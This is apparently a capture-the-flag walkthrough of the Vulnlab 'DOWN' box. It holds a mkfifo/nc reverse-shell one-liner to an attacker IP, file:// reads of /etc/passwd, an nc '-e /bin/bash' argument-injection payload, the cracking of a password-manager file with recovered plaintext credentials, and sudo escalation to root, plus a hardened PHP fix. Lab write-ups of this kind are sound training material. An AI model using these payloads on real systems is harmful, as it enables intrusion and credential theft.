Here are my notes on the DOWN box from Vulnlab, which was deployed to HackTheBox yesterday.
DOWN: 10.10.95.4
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 f6cc217ccadaed34fd04efe6f94cddf8 (ECDSA)
|_ 256 fa061ff4bf8ce3b0c840210d5706dd11 (ED25519)
80/tcp open http Apache httpd 2.4.52 ((Ubuntu))
|_http-title: Is it down or just me?
|_http-server-header: Apache/2.4.52 (Ubuntu)
Nothing interesting from Nikto - NOPE !
/index.php:
Is that website down, or is it just you?
Input field: "Please enter a URL."
Looks like it responds to my Kali listener really well.
http://10.8.0.71/ || whoami && wget http://10.8.0.71/
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.8.0.71 1234 >/tmp/f
OS command injection example: #DOWN-VL
sudo nc -lnvp 80
listening on [any] 80 ...
connect to [10.8.0.71] from (UNKNOWN) [10.10.95.4] 51664
GET / HTTP/1.1
Host: 10.8.0.71
User-Agent: curl/7.81.0
Accept: */*
So the target uses curl to fetch the supplied URL.
url=http://localhost/+%26%26+file%3a///etc/passwd
http://localhost/ && file:///etc/passwd
url=http://localhost/+file:///etc/passwd
http://localhost/ file:///etc/passwd
(curl accepts several URLs on one command line, so the space-separated file:// URL is fetched as well.)
url=http://localhost/+file:///var/www/html/index.php
index.php:
<?php
if ( isset($_GET['expertmode']) && $_GET['expertmode'] === 'tcp' ) {
    echo '<h1>Is the port refused, or is it just you?</h1>
    <form id="urlForm" action="index.php?expertmode=tcp" method="POST">
        <input type="text" id="url" name="ip" placeholder="Please enter an IP." required><br>
        <input type="number" id="port" name="port" placeholder="Please enter a port number." required><br>
        <button type="submit">Is it refused?</button>
    </form>';
} else {
    echo '<h1>Is that website down, or is it just you?</h1>
    <form id="urlForm" action="index.php" method="POST">
        <input type="url" id="url" name="url" placeholder="Please enter a URL." required><br>
        <button type="submit">Is it down?</button>
    </form>';
}
if ( isset($_GET['expertmode']) && $_GET['expertmode'] === 'tcp' && isset($_POST['ip']) && isset($_POST['port']) ) {
    $ip = trim($_POST['ip']);
    $valid_ip = filter_var($ip, FILTER_VALIDATE_IP);
    $port = trim($_POST['port']);
    // BUG: intval("1234 -e /bin/bash") is 1234, so the check below passes...
    $port_int = intval($port);
    $valid_port = filter_var($port_int, FILTER_VALIDATE_INT);
    if ( $valid_ip && $valid_port ) {
        $rc = 255; $output = '';
        // ...but the raw $port string is interpolated here, and escapeshellcmd()
        // does not touch spaces or dashes, so extra nc arguments survive.
        $ec = escapeshellcmd("/usr/bin/nc -vz $ip $port");
        exec($ec . " 2>&1",$output,$rc);
        echo '<div class="output" id="outputSection">';
        if ( $rc === 0 ) {
            echo "<font size=+1>It is up. It's just you! 😝</font><br><br>";
            echo '<p id="outputDetails"><pre>'.htmlspecialchars(implode("\n",$output)).'</pre></p>';
        } else {
            echo "<font size=+1>It is down for everyone! 😔</font><br><br>";
            echo '<p id="outputDetails"><pre>'.htmlspecialchars(implode("\n",$output)).'</pre></p>';
        }
[SNIP]
BurpSuite:
POST /index.php?expertmode=tcp
ip=10.8.0.71&port=1234 #WORKS !
ip=10.8.0.71&port=1234+-e+/bin/bash #intval() still sees 1234, the rest is passed to nc as extra arguments
https://xr34p.com/posts/Vulnlab-Down-Writeup/
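The hardened form of the checks above, as an added example rather than the box's own index.php (helper names validate_target, build_nc_command and validate_url are hypothetical; it assumes the snipped URL handler also passes its input to a shell command):

```php
<?php
// Added example, not the box's own index.php: hardened versions of its two
// checks (helper names are hypothetical). The page's bug: intval() turns
// "1234 -e /bin/bash" into 1234, the raw string is still interpolated, and
// escapeshellcmd() leaves spaces and "-" alone, so nc gets extra arguments.
/** Return [ip, port] for valid input, or null when either field is rejected. */
function validate_target(string $ip, string $port): ?array
{
    $ip = filter_var(trim($ip), FILTER_VALIDATE_IP);
    // Validate the raw string, not intval() of it: FILTER_VALIDATE_INT
    // rejects trailing characters, and the range option bounds the port.
    $port = filter_var(trim($port), FILTER_VALIDATE_INT, [
        'options' => ['min_range' => 1, 'max_range' => 65535],
    ]);
    if ($ip === false || $port === false) {
        return null;
    }
    return [$ip, $port];
}
/** Quote every user-derived value as exactly one shell argument. */
function build_nc_command(string $ip, int $port): string
{
    return '/usr/bin/nc -vz ' . escapeshellarg($ip) . ' '
        . escapeshellarg((string) $port) . ' 2>&1';
}

/**
 * Accept only absolute http(s) URLs: the scheme allow-list is what blocks
 * file:///etc/passwd; rejecting whitespace and shell metacharacters is defence
 * in depth (the curl call should still use escapeshellarg() and --proto).
 */
function validate_url(string $url): ?string
{
    $url = trim($url);
    $parts = parse_url($url);
    if ($parts === false || !isset($parts['scheme'], $parts['host'])) {
        return null;
    }
    if (!in_array(strtolower($parts['scheme']), ['http', 'https'], true)) {
        return null;
    }
    if (preg_match('/[\s;&|`$<>()]/', $url)) {
        return null;
    }
    return $url;
}
// Constructed inputs taken from the requests shown above.
var_dump(validate_target('10.8.0.71', '1234 -e /bin/bash'));
var_dump(validate_url('http://localhost/ file:///etc/passwd'));
```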
┌──(root㉿kali)-[/home/kali/Kali-Tools/p0wny-shell/shell.php]
└─# sudo nc -lnvp 1234
listening on [any] 1234 ...
connect to [10.8.0.71] from (UNKNOWN) [10.10.95.4] 44298
whoami
www-data
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
hostname
down
python3 -c 'import pty; pty.spawn("/bin/bash")'
python3 -c 'import pty; pty.spawn("/bin/bash")'
USER-SHELL !
www-data@down:/var/www/html$ ls
ls
index.php logo.png style.css user_aeT1xa.txt
www-data@down:/var/www/html$ cat user_aeT1xa.txt
cat user_aeT1xa.txt
VL{REDIRECTED}
USER.TXT: VL{REDIRECTED}
PRIV ESC:
www-data -> aleks:
gcc is available.
No interesting /opt directory.
No SUID binaries of note.
Nothing from sudo -l.
No interesting getcap binaries either.
LINPEAS:
[+] .sh files in path
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#script-binaries-in-path
/usr/bin/gettext.sh #NOPE
/usr/bin/rescan-scsi-bus.sh #NOPE
[+] Files inside others home (limit 20)
/home/aleks/.bashrc
/home/aleks/.sudo_as_admin_successful
/home/aleks/.local/share/pswm/pswm #Interesting ?
/home/aleks/.profile
/home/aleks/.bash_logout
www-data@down:/home/aleks/.local/share/pswm$ ls -lah
ls -lah
total 12K
drwxrwxr-x 2 aleks aleks 4.0K Sep 13 15:36 .
drwxrwxr-x 3 aleks aleks 4.0K Sep 13 15:36 ..
-rw-rw-r-- 1 aleks aleks 151 Sep 13 15:36 pswm
www-data@down:/home/aleks/.local/share/pswm$ cat pswm
cat pswm
e9laWoKiJ0OdwK05b3hG7xMD+uIBBwl/v01lBRD+pntORa6Z/Xu/TdN3aG/ksAA0Sz55/kLggw==*xHnWpIqBWc25rrHFGPzyTg==*4Nt/05WUbySGyvDgSlpoUw==*u65Jfe0ml9BFaKEviDCHBQ==
No crontab either, and nothing in cron.d.
PSWM Cracking:
https://xr34p.com/posts/Vulnlab-Down-Writeup/
https://github.com/seriotonctf/pswm-decryptor
┌──(root㉿kali)-[/home/kali/Kali-Tools/pswm-decryptor]
└─# sudo pip3 install cryptocode prettytable
Collecting cryptocode
Downloading cryptocode-0.1-py3-none-any.whl.metadata (2.9 kB)
Requirement already satisfied: prettytable in /usr/lib/python3/dist-packages (3.6.0)
Requirement already satisfied: pycryptodomex in /usr/lib/python3/dist-packages (from cryptocode) (3.11.0)
Requirement already satisfied: wcwidth in /usr/lib/python3/dist-packages (from prettytable) (0.2.13)
Downloading cryptocode-0.1-py3-none-any.whl (4.1 kB)
Installing collected packages: cryptocode
Successfully installed cryptocode-0.1
WARNING: Running pip as the 'root' user can result in broken permissions and conflicting behaviour with the system package manager. It is recommended to use a virtual environment instead: https://pip.pypa.io/warnings/venv
┌──(root㉿kali)-[/home/kali/Kali-Tools/pswm-decryptor]
└─# sudo leafpad pswm
┌──(root㉿kali)-[/home/kali/Kali-Tools/pswm-decryptor]
└─# cat pswm
e9laWoKiJ0OdwK05b3hG7xMD+uIBBwl/v01lBRD+pntORa6Z/Xu/TdN3aG/ksAA0Sz55/kLggw==*xHnWpIqBWc25rrHFGPzyTg==*4Nt/05WUbySGyvDgSlpoUw==*u65Jfe0ml9BFaKEviDCHBQ==
┌──(root㉿kali)-[/home/kali/Kali-Tools/pswm-decryptor]
└─# python3 pswm-decrypt.py -f pswm -w /usr/share/wordlists/rockyou.txt
[+] Master Password: flower
[+] Decrypted Data:
+------------+----------+----------------------+
| Alias | Username | Password |
+------------+----------+----------------------+
| pswm | aleks | flower |
| aleks@down | aleks | 1uY3w22uc-Wr{xNHR~+E |
+------------+----------+----------------------+
aleks:1uY3w22uc-Wr{xNHR~+E - aleks SHELL !
┌──(root㉿kali)-[/home/kali/VULNLAB]
└─# sudo rlwrap nc -lnvp 1234
listening on [any] 1234 ...
connect to [10.8.0.71] from (UNKNOWN) [10.10.95.4] 57756
python3 -c 'import pty; pty.spawn("/bin/bash")'
www-data@down:/var/www/html$
www-data@down:/var/www/html$ su - aleks
su - aleks
Password: flower
su: Authentication failure
www-data@down:/var/www/html$ su - aleks
su - aleks
Password: 1uY3w22uc-Wr{xNHR~+E
aleks@down:~$ whoami
whoami
aleks
aleks -> ROOT:
aleks@down:~$ sudo -l
sudo -l
[sudo] password for aleks: 1uY3w22uc-Wr{xNHR~+E
Matching Defaults entries for aleks on down:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
use_pty
User aleks may run the following commands on down:
(ALL : ALL) ALL
aleks@down:~$ sudo su
sudo su
root@down:/home/aleks# whoami
whoami
root
root@down:/home/aleks# id
id
uid=0(root) gid=0(root) groups=0(root)
root@down:/home/aleks# hostname
hostname
down
ROOT-SHELL !
root@down:~# whoami
whoami
root
root@down:~# hostname
hostname
down
root@down:~# ls
ls
root.txt snap
root@down:~# cat root.txt
cat root.txt
VL{REDIRECTED}
ROOT.TXT: VL{REDIRECTED}
/javascript - Forbidden - NOPE !
/server-status - Forbidden - NOPE !
Page source of index.php: nothing interesting.
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel